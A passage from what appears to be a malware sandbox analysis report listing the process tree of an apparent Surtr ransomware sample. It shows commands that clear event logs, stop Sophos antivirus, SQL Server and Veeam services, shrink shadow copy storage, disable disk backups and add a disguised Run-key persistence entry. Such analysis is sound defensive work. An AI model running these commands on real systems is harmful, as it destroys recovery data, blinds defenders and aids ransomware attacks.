    wevtutil.exe cl "Microsoft-Windows-OfflineFiles/SyncLog"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3948
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-OneX/Diagnostic"
    3⤵
    PID:3952
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-OobeLdr/Analytic"
    3⤵
    PID:3984
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PCI/Diagnostic"
    3⤵
    PID:3996
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ParentalControls/Operational"
    3⤵
    PID:3960
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PeerToPeerDrtEventProvider/Diagnostic"
    3⤵
    PID:4016
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PeopleNearMe/Operational"
    3⤵
    PID:4076
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PortableDeviceStatusProvider/Analytic"
    3⤵
    PID:4080

C:\Windows\system32\net.exe
net stop " Enterprise Client Service"
1⤵
PID:2104
- C:\Windows\system32\net1.exe
  C:\Windows\system32\net1 stop " Enterprise Client Service"
  2⤵
  PID:2276

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=401MB
1⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2252

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=401MB
1⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2236

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=401MB
1⤵
- Interacts with shadow copies
PID:2228

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=401MB
1⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2220

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=401MB
1⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2140

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2484

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sophos Health Service"
1⤵
PID:2972

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sophos Web Control Service"
1⤵
PID:3440

C:\Windows\system32\net.exe
net stop "Sophos Web Control Service"
1⤵
PID:3412

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
1⤵
PID:3604

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "IISAdmin"
1⤵
PID:2620

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f
1⤵
- Enumerates connected drives
PID:2212

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos1" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
1⤵
- Adds Run key to start application
PID:2236

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MSSQL$ECWDB2"
1⤵
PID:2928

C:\Windows\system32\net.exe
net stop "MSSQL$PRACTICEMGT"
1⤵
PID:852
- C:\Windows\system32\net1.exe
  C:\Windows\system32\net1 stop "MSSQL$PRACTICEMGT"
  2⤵
  PID:1796

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MSSQL$PRACTTICEBGC"
1⤵
PID:1524

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MSSQL$VEEAMSQL2008R2"
1⤵
PID:392

C:\Windows\system32\net.exe
net stop "MSSQL$VEEAMSQL2012"
1⤵
PID:1840
- C:\Windows\system32\net1.exe
  C:\Windows\system32\net1 stop "MSSQL$VEEAMSQL2012"
  2⤵
  PID:3384

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MSSQLFDLauncher$SQL_2008"
1⤵
PID:1664

C:\Windows\system32\net.exe
net stop "ReportServer$TPS"
1⤵
PID:3756
- C:\Windows\system32\net1.exe
  C:\Windows\system32\net1 stop "ReportServer$TPS"
  2⤵
  PID:3788